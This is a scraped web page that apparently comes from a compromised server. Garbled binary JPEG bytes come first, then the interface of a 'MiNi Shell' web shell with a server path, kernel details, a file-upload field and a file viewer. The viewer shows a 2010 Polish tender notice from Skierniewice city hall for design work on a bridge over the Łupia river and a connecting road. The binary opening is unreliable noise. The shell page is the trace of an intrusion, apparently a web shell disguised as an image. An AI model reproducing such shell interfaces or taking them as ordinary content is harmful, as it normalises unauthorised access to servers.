JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100823/261518-N-2010.html

<p class="kh_header"><b>Skierniewice: Opracowanie kompletnych dokumentacji projektowych dla realizacji zadań inwestycyjnych pn. Przebudowa mostu na rzece Łupii w ul. 1 Maja w ciągu drogi wojewódzkiej nr 705 oraz Budowa drogi łączącej Rondo Solidarności z ul. Rawską</b><br>
<b>Numer ogłoszenia: 261518 - 2010; data zamieszczenia: 23.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Skierniewice , ul. Rynek 1, 96-100 Skierniewice, woj. łódzkie, tel. 046 8345100, faks 046 8345151.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie kompletnych dokumentacji projektowych dla realizacji zadań inwestycyjnych pn. Przebudowa mostu na rzece Łupii w ul. 1 Maja w ciągu drogi wojewódzkiej nr 705 oraz Budowa drogi łączącej Rondo Solidarności z ul. Rawską.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest opracowanych kompletnych, wielobranżowych dokumentacji projektowych, budowlanych i przetargowych wraz z uzyskaniem przez Wykonawcę wszystkich niezbędnych opinii, uzgodnień i decyzji administracyjnych pozwalających Zamawiającemu na realizację zadań inwestycyjnych polegających na:
a)przebudowie mostu na rzece Łupii w ul. 1 Maja w ciągu drogi wojewódzkiej nr 705,
b)budowie drogi łączącej Rondo Solidarności z ul. Rawską.
2. W skład dokumentacji dla każdego z zadań inwestycyjnych wchodzą następujące elementy, których wykonanie będzie leżało po stronie Wykonawców:
a)projekt budowlany (PB),
b)projekt wykonawczy (PW),
c)kosztorys inwestorski (KI),
d)kosztorys ślepy (KS),
e)przedmiar robót (PR),
f)specyfikacje techniczne wykonania i odbioru robót (SST),
g)projekty stałej i tymczasowej organizacji ruchu,
h)dokumentacja projektowa konieczna do przeprowadzenia postępowania przetargowego na wybór wykonawców robót budowlanych,
i)materiały do wniosku o wydanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia wraz z pozyskaniem decyzji,
j)raport o oddziaływaniu inwestycji na środowisko,
k)mapa do celów projektowych,
l)dokumentacja geologiczno inżynierska,
m)materiały do decyzji wodnoprawnej,
n)operat wodnoprawny,
o)geotechniczne warunki posadowienia obiektów budowlanych,
p)materiały do wniosku, złożenie wniosku i pozyskanie decyzji o zezwoleniu na realizacje inwestycji drogowej/pozwolenia na budowę,
q)materiały do wniosku o wydanie decyzji o ustaleniu celu publicznego i pozyskanie stosownej decyzji - w razie konieczności oraz opinie niezbędne do pozyskania ostatecznych decyzji administracyjnych.
3. Szczegółowy zakres opracowań poszczególnych elementów dla każdej z części zamówienia opisano w Specyfikacjach Technicznych zawartych w załącznikach nr 11-16 stanowiących integralną część SIWZ.
4. Orientacyjny przebieg drogi łączącej Rondo Solidarności z ul. Rawską został pokazany
w załączniku graficznym do niniejszego opisu.
5. Wyżej wymienione opracowania projektowe i materiały do wniosków zostaną wykonane przez Wykonawcę i przekazane Zamawiającemu w ilości egzemplarzy wskazanej w Tabeli opracowań projektowych/Wycenie opracowań stanowiącej załącznik nr 7 do SIWZ. Wykonawca dodatkowo wykona niezbędną ilość egzemplarzy wymaganą dla pozyskania stosownych uzgodnień, opinii
i złożenia wniosków potrzebnych do wydania stosownych decyzji administracyjnych.
6. Celem zamówienia jest opracowanie kompletnych, wielobranżowych oraz wykonanych
w odpowiedniej jakości dokumentacji projektowych wraz z uzyskaniem wszystkich wymaganych uzgodnień, opinii,  pozwoleń i decyzji administracyjnych pozwalających na realizację przebudowy mostu na rzece Łupii w ul. 1 Maja w ciągu drogi wojewódzkiej nr 705 oraz na wykonanie drogi łączącej Rondo Solidarności z ul. Rawską. Wykonane dokumentacje powinny umożliwić Zamawiającemu:
a)podjęcie działań o pozyskanie środków finansowych na budowę drogi,
b)przeprowadzenie przetargu na wykonanie robót budowlanych,
c)wykonanie robót przez Wykonawcę, ich odbiór i zapewnienie nadzoru autorskiego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza udzielenie zamówień uzupełniających zgodnie z art. 67, ust. 1, pkt 6 Ustawy. Zamówienia uzupełniające stanowić mogą nie więcej niż 50% wartości zamówienia podstawowego i będą zgodne z przedmiotem niniejszego zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.23.22.00-6, 74.14.19.00-8, 74.27.12.20-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości 1 800 zł (tysiąc osiemset złotych) - w przypadku części I i 12 000 zł (dwanaście tysięcy złotych) -
w przypadku części II.
2.Wadium powinno być wniesione przed upływem terminu składania ofert.
3.Wadium może być wniesione w formach przewidzianych w art. 45. ust. 6. Ustawy.
4.Wadium w pieniądzu należy wpłacić na rachunek bankowy o nr konta: KREDYT BANK S.A. oddział w Skierniewicach nr 42 1500 1689 1216 8004 0851 0000 z dopiskiem RI - wadium do przetargu pn. Opracowanie kompletnych dokumentacji projektowych  dla realizacji zadań inwestycyjnych
a)Część I - Opracowanie kompletnej dokumentacji projektowej dla realizacji zadania inwestycyjnego - Wykonanie przebudowy mostu na rzece Łupii w ul. 1 Maja w ciągu drogi wojewódzkiej nr 705,
b)Cześć II - Opracowanie kompletnej dokumentacji projektowej dla realizacji zadania inwestycyjnego -  Budowa drogi łączącej Rondo Solidarności z ul. Rawską.
5.Zamawiający będzie przechowywał wadium wniesione w pieniądzu na rachunku bankowym
i jego zwrot nastąpi zgodnie z art.46 ust. 4 ustawy.
6.Wadium w innych dopuszczonych formach należy wnieść w kasie Urzędu Miasta Skierniewice.
7.Zwrot wadium nastąpi w przypadkach i na warunkach przewidzianych w art. 46 Ustawy.
8.Zamawiający zatrzyma wadium wraz z odsetkami w przypadkach przewidzianych w art. 46 ust. 4a i 5 ustawy.
9.Wadium należy wnieść na okres związania ofertą</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że poniższy warunek zostanie spełniony przez Wykonawcę, który wykonał,
z należytą starannością w okresie trzech lat przed upływem terminu otwarcia ofert, a jeśli okres działalności jest krótszy - w tym okresie, co najmniej jeden projekt odpowiadający swoim rodzajem przedmiotowi zamówienia. Za projekt odpowiadający swoim rodzajem przedmiotowi zamówienia Zamawiający uzna: wykonanie projektu drogi przynajmniej klasy G o długości minimum 1200 m (w przypadku części II) oraz wykonanie projektu budowy lub przebudowy obiektu mostowego o długości minimum 40 m (w przypadku części I),</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że poniższy warunek zostanie spełniony przez Wykonawcę, który dysponuje odpowiednio wykwalifikowanym personelem posiadającym wymagane uprawnienia do pełnienia samodzielnych funkcji w budownictwie. W przypadku części I wymagane jest posiadanie co najmniej jednej osoby posiadającej uprawnienia do projektowania w specjalności drogowej oraz co najmniej jednej do projektowania w specjalności mostowej. W przypadku części II wymagane jest posiadanie następującego personelu
a) Projektant prowadzący - Do projektowania w specjalności drogowej -1,
b) Projektant branży drogowej -Do projektowania w specjalności drogowej - 1,
c) Projektant branży mostowej- Do projektowania w specjalności mostowej - 1,
d) Projektant inżynierii ruchu - Wykształcenie wyższe w zakresie budowy dróg- 1
e) Projektant branży energetycznej - Do projektowania w specjalności instalacyjnej w zakresie sieci elektrycznej i elektroenergetycznej - 1
f) Projektant branży wodnokanalizacyjnej - Do projektowania w specjalności instalacyjnej
w zakresie sieci wodociągowych i kanalizacyjnych - 1
g) Projektant branży teletechnicznej - Do projektowania w specjalności telekomunikacyjnej - 1
h) Projektant branży gazowniczej - Do projektowania w specjalności instalacyjnej w zakresie sieci gazowych - 1
i) Geodeta- Geodezyjno - kartograficzne w zakresie będącym przedmiotem zamówienia - 1
j) Specjalista w zakresie ochrony środowiska - Wykształcenie wyższe w zakresie ochrony środowiska - 1</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że poniższy warunek zostanie spełniony przez Wykonawcę, który posiada aktualną i opłaconą polisę ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę co najmniej 500.000 zł (pięćset tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wszyscy oferenci ubiegający się o niniejsze zamówienie muszą spełnić poniższe warunki
i dołączyć wskazane poniżej oświadczenia i dokumenty do oferty:
a)ofertę wykonawcy - wg wzoru stanowiącego załącznik nr 1 do SIWZ,
b)oświadczenie o spełnianiu warunków udziału w postępowaniu zawartych w art. 22, ust. 1, pkt 1-4 - wg wzoru stanowiącego załącznik nr 2 do SIWZ,
c)oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy - wg wzoru stanowiącego załącznik nr 3 do SIWZ,
d)wypełniony formularz Wycena opracowania - załącznik nr 7 z cenami za poszczególne elementy usługi oraz wartością usługi odpowiadającej cenie ofertowej zamówienia. Przedmiotowa wycena ma charakter informacyjny i nie wpływa na ryczałtowy charakter ceny ofertowej. W przypadku gdy Wykonawca nie składa oferty na jedną z części wówczas do oferty nie dołącza Wyceny Opracowania dla danej części,
e)potwierdzenie wniesienia wadium,
2. W celu potwierdzenia spełniania warunku posiadania przez Wykonawcę niezbędnej wiedzy
i doświadczenia oraz dysponowania osobami zdolnymi do wykonania zamówienia wykonawcy powinien załączyć do oferty:
a)informację dotyczącą podwykonawców, którym Wykonawca zamierza zlecić realizację części zadania wraz z określeniem części, które będą przez nich realizowane - stanowiącą załącznik nr 8. Jeśli Wykonawca nie zamierza korzystać z podwykonawców wówczas dołącza do oferty załącznik nr 8 i pisze Nie dotyczy. Jeśli Wykonawca korzysta z potencjału technicznego lub osób zdolnych do wykonania Zamówienia udostępnionych przez inne podmioty i nie korzysta z podwykonawców wówczas również pisze Nie dotyczy.
3. Wykonawcy wspólnie starający się o wykonanie zamówienia powinni zwrócić uwagę na następujące wymagania:
a)dokumenty wymienione w punktach 9.1.b) i c) oraz 9.1.f) - 9.1.h) każdy z członków konsorcjum składa we własnym imieniu,
b)pozostałe dokumenty wymienione w punktach: 9.1, 9.2 i 9.3. powinny być podpisane przez wszystkich członków konsorcjum lub Pełnomocnika występującego w ich imieniu. 
c)Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponosić będą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W sytuacjach nieprzewidzianych i nie zawinionych przez Wykonawcę (zwłoka w wydawaniu niezbędnych decyzji i pozwoleń) dopuszcza się przedłużenie terminu realizacji zadań. Wszelkie zmiany muszą mieć formę pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.skierniewice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Realizacji Inwestycji Urzędu Miasta Skierniewice, ul. Floriana 9, pok. 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.09.2010 godzina 11:30, miejsce: Sekretariat Urzędu Miasta Skierniewice, ul. Rynek 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie kompletnej dokumentacji projektowej dla realizacji zadania inwestycyjnego - Wykonanie przebudowy mostu na rzece Łupii w ul. 1 Maja w ciągu drogi wojewódzkiej nr 705.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanych kompletnych, wielobranżowych dokumentacji projektowych, budowlanych i przetargowych wraz z uzyskaniem przez Wykonawcę wszystkich niezbędnych opinii, uzgodnień i decyzji administracyjnych pozwalających Zamawiającemu na realizację zadania inwestycyjnego polegającego na przebudowie mostu na rzece Łupii w ul. 1 Maja w ciągu drogi wojewódzkiej nr 705.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.23.22.00-6, 74.14.19.00-8, 74.27.12.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie kompletnej dokumentacji projektowej dla realizacji zadania inwestycyjnego -  Budowa drogi łączącej Rondo Solidarności z ul. Rawską.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanych kompletnych, wielobranżowych dokumentacji projektowych, budowlanych i przetargowych wraz z uzyskaniem przez Wykonawcę wszystkich niezbędnych opinii, uzgodnień i decyzji administracyjnych pozwalających Zamawiającemu na realizację zadania inwestycyjnego polegającego na budowie drogi łączącej Rondo Solidarności z ul. Rawską..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.23.22.00-6, 74.14.19.00-8, 74.27.12.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com